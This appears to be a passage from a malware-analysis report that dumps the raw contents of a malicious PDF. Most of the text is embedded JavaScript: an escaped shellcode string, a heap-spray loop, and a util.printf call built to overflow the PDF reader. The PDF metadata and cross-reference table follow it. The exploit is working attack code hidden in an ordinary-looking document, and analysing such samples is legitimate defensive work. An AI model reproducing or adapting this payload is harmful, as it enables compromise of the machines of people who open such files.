"%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B" +
"%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9" +
"%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5" +
"%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4" +
"%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5" +
"%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2" +
"%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125" +
"%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233" +
"%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.